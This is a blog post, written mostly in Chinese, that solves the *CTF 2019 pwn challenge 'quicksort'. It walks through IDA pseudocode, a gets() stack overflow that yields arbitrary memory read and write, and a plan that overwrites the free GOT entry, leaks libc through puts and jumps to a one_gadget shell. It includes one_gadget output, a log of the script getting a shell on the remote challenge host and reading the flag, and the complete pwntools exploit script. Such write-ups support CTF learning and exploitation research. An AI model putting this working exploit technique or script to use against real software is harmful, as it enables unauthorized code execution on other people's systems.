StarCTF


*CTF2019

pwn

shellcode

check

Thought

Solution

### quicksort

check

checksec quicksort
[*] '/ctf/work/star/quicksort/quicksort'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
check ida(main2 的反编译结果如下,注意各局部变量的 ebp 偏移):


/*
 * IDA pseudocode of the challenge's main loop (i386, no PIE, Partial RELRO,
 * stack canary, NX -- see the checksec output above).  It reads a count,
 * then `count` lines with gets(), converts each line with atoi() into a
 * malloc'd int array, sorts the array, prints it and frees it.
 *
 * Stack layout, taken from the ebp offsets IDA attached to each local:
 *   ebp-0x2c .. ebp-0x1d  s, v3..v17  -- one 16-byte line buffer that IDA
 *                                         split into single chars because
 *                                         every byte is zeroed separately
 *   ebp-0x1c  v18  element count
 *   ebp-0x18  i    write index
 *   ebp-0x14  j    read index
 *   ebp-0x10  ptr  array pointer
 *   ebp-0x0c  v22  stack canary
 * gets(&s) has no length limit, so one long line overwrites v18, i, j and
 * ptr in that order and can stop just short of the canary.
 */
unsigned int main2()
{
  int *v0; // ebx
  char s; // [esp+Ch] [ebp-2Ch]   gets() target; start of the 16-byte buffer
  char v3; // [esp+Dh] [ebp-2Bh]
  char v4; // [esp+Eh] [ebp-2Ah]
  char v5; // [esp+Fh] [ebp-29h]
  char v6; // [esp+10h] [ebp-28h]
  char v7; // [esp+11h] [ebp-27h]
  char v8; // [esp+12h] [ebp-26h]
  char v9; // [esp+13h] [ebp-25h]
  char v10; // [esp+14h] [ebp-24h]
  char v11; // [esp+15h] [ebp-23h]
  char v12; // [esp+16h] [ebp-22h]
  char v13; // [esp+17h] [ebp-21h]
  char v14; // [esp+18h] [ebp-20h]
  char v15; // [esp+19h] [ebp-1Fh]
  char v16; // [esp+1Ah] [ebp-1Eh]
  char v17; // [esp+1Bh] [ebp-1Dh]   last byte of the buffer
  int v18; // [esp+1Ch] [ebp-1Ch]   element count -- first thing the overflow reaches
  int i; // [esp+20h] [ebp-18h]     write index, overwritable
  int j; // [esp+24h] [ebp-14h]     read index, overwritable
  void *ptr; // [esp+28h] [ebp-10h] array pointer, overwritable
  unsigned int v22; // [esp+2Ch] [ebp-Ch]   stack canary, directly above ptr

  v22 = __readgsdword(0x14u);   // load the canary
  v3 = 0;
  v4 = 0;
  v5 = 0;
  v6 = 0;
  v7 = 0;
  v8 = 0;
  v9 = 0;
  v10 = 0;
  v11 = 0;
  v12 = 0;
  v13 = 0;
  v14 = 0;
  v15 = 0;
  v16 = 0;
  v17 = 0;
  s = 0;
  v18 = 0;
  puts("how many numbers do you want to sort?");
  __isoc99_scanf("%d", &v18);   // count is never range-checked
  getchar();
  ptr = malloc(4 * v18);        // result is not checked for NULL
  for ( i = 0; i < v18; ++i )
  {
    printf("the %dth number:", i + 1);
    gets(&s);                   // unbounded read: overflows into v18, i, j, ptr
    v0 = (int *)((char *)ptr + 4 * i);   // both ptr and i may already be attacker-chosen here
    *v0 = atoi(&s);             // -> write of an attacker-chosen int to an attacker-chosen address
  }
  sort1((int)ptr, 0, v18 - 1);
  puts("Here is the result:");
  for ( j = 0; j < v18; ++j )
    printf("%d ", *((_DWORD *)ptr + j));   // with ptr overwritten this prints arbitrary memory as signed decimal
  puts(&byte_8048AD2);
  free(ptr);                    // called through free's GOT slot, which Partial RELRO leaves writable
  return __readgsdword(0x14u) ^ v22;   // canary check; the overflow above stops before v22
}

Thought

  • s 位于 ebp-0x2c,由 gets() 读入且没有长度限制;一行输入往高地址依次覆盖 v18(元素个数)、i、j 和 ptr(ebp-0x10),而 canary 在 ebp-0xc,只要不写过 ptr 就不会触发栈保护。随后的 `*(ptr + 4*i) = atoi(s)` 就变成了任意地址 4 字节写,输出循环里的 `printf("%d ", ptr[j])` 则是任意地址读。

  • 第一次写:把 free 的 GOT 项(Partial RELRO,GOT 可写)改成 main2 的地址,这样 main2 末尾的 free(ptr) 会重新进入 main2,可以反复输入、反复利用。

  • 第二次:把 ptr 指向 puts 的 GOT 项,并令 i=1,使这一轮必然发生的写落到下一个 GOT 项(__libc_start_main,之后不会再被调用)而不破坏 puts 的项;然后输出循环用 printf("%d ") 打印 ptr[0],泄漏 puts 在 libc 中的真实地址,减去偏移即得 libc 基址。注意输出是带符号十进制,需要先转回无符号。

  • 用 one_gadget 在目标 libc 中寻找 execve("/bin/sh") 的 gadget。puts 偏移和 gadget 偏移必须来自与远程相同的 libc 版本,否则第三次写入的地址是错的。

  • 0x3ac5c execve("/bin/sh", esp+0x28, environ)
    constraints:
      esi is the GOT address of libc
      [esp+0x28] == NULL
    
    0x3ac5e execve("/bin/sh", esp+0x2c, environ)
    constraints:
      esi is the GOT address of libc
      [esp+0x2c] == NULL
    
    0x3ac62 execve("/bin/sh", esp+0x30, environ)
    constraints:
      esi is the GOT address of libc
      [esp+0x30] == NULL
  • 第三次:把 free 的 GOT 项改成 one_gadget 的地址,同时把元素个数写成 0 以跳过排序和输出,free(ptr) 直接 getshell。注意写入值是以十进制字符串经 atoi 传入的(负数也可以),字符串长度会影响后面填充的零字节数;另外 gets() 只在遇到 '\n'(0x0a) 时停止,payload 中的地址字节不能含 0x0a。

root@prime:/ctf/work/star/quicksort# ./p.py 
[+] Opening connection to 34.92.96.238 on port 10000: Done
[+] -136733602
[*] Switching to interactive mode
Here is the result:

$ ls
chall
flag
pwn
$ cat flag
*CTF{lSkR5u3LUh8qTbaCINgrjdJ74iE9WsDX}

Solution

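#!/usr/bin/env python
"""*CTF 2019 pwn/quicksort exploit (i386, no PIE, Partial RELRO, canary, NX).

main2() reads every number with gets() into a 16-byte stack buffer that sits
directly below the element count, the loop indices i/j and the array
pointer ptr (the canary lies above ptr and is left untouched).  Because the
program then executes ``*(ptr + 4*i) = atoi(line)`` and later
``printf("%d ", ptr[j])``, one overflowing line yields an arbitrary 4-byte
write and an arbitrary 4-byte read.  Three lines are enough:

  1. free@GOT <- main2       so the trailing free(ptr) re-enters main2
  2. leak puts@GOT through the print loop -> libc base
  3. free@GOT <- one_gadget  the next free(ptr) pops a shell

Python 2 / pwntools script: str and p32() results are concatenated directly.
"""
from pwn import *
import ctypes
#p = process('./quicksort')
#nc 34.92.96.238 10000
p = remote('34.92.96.238',10000)

debug = 0
if debug:
    context.log_level = 'debug'
    context.terminal = ['tmux','splitw','-h']
    gdb.attach(p)

# Binary addresses (no PIE, so they are fixed).
libc_start_got = 0x804a030   # GOT slot right after puts@GOT; stage 2 writes here, it is never used again
#[0x804a018] free
main2_addr = 0x8048816 #134514710
free_got = 0x804a018
puts_got = 0x804a02c

puts_plt = 0x8048560  #134514016
printf_plt = 0x80484f0 #134513904
# libc offsets: they must come from the same libc build as the remote target,
# otherwise stage 3 writes a wrong address into free@GOT and the process crashes.
puts_libc = 0x5fca0
one = 0x3ac5e#0x3ac62

# Distance from the start of the line buffer (ebp-0x2c) to the count (ebp-0x1c).
BUF_LEN = 0x2c - 0x1c


def build_line(value, count, i, j, ptr):
    """Build one gets() line: atoi(line) == value, then count/i/j/ptr overwritten.

    value is emitted as a NUL-terminated signed decimal (atoi stops at the
    NUL) and the rest of the 16-byte buffer is zero-padded from the actual
    string length, so 9-, 10- or 11-character values all stay aligned with
    the locals that follow.  gets() stops only at '\\n', so a payload that
    contains 0x0a would be silently truncated; reject it instead.
    """
    num = str(ctypes.c_int(value).value) + '\x00'
    if len(num) > BUF_LEN:
        raise ValueError('%r does not fit the %d-byte line buffer' % (value, BUF_LEN))
    line = num + '\x00' * (BUF_LEN - len(num))
    line += p32(count) + p32(i) + p32(j) + p32(ptr)
    if '\n' in line:
        raise ValueError('payload contains 0x0a; gets() would cut it short')
    return line


# Stage 1: ptr[0] = main2 with ptr = free@GOT, so the free(ptr) at the end of
# main2 jumps back into main2 and we get further input rounds.
p.sendlineafter('to sort?','1')
p.sendlineafter('number:', build_line(main2_addr, 1, 0, 0, free_got))

# Stage 2: ptr = puts@GOT and i = 1, so the unavoidable write of this round
# lands on the next GOT slot (__libc_start_main, never called again) and
# ptr[0] stays intact for the print loop to leak puts' libc address.
p.sendlineafter('to sort?','1')
p.sendlineafter('number:', build_line(printf_plt, 1, 1, 0, puts_got))

p.recvline()                     # "Here is the result:"
# printf("%d ") prints the pointer as a signed int; recover the unsigned value.
puts_addr = ctypes.c_uint(int(p.recvline())).value
one_real = puts_addr + one - puts_libc
one_real = ctypes.c_int(one_real).value   # back to signed so str() gives what atoi() expects
log.success(one_real)

# Stage 3: ptr[0] = one_gadget with ptr = free@GOT; count = 0 skips the sort
# and the print loop, so free(ptr) -> execve("/bin/sh") runs immediately.
p.sendlineafter('to sort?','1')
p.sendlineafter('number:', build_line(one_real, 0, 0, 0, free_got))

p.interactive()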

x


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论。

文章标题:StarCTF

本文作者:枫云李

发布时间:2019-04-29, 00:00:00

最后更新:2020-04-11, 01:13:45

原始链接:https://primelyw.github.io/2019/04/29/StarCTF/

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。
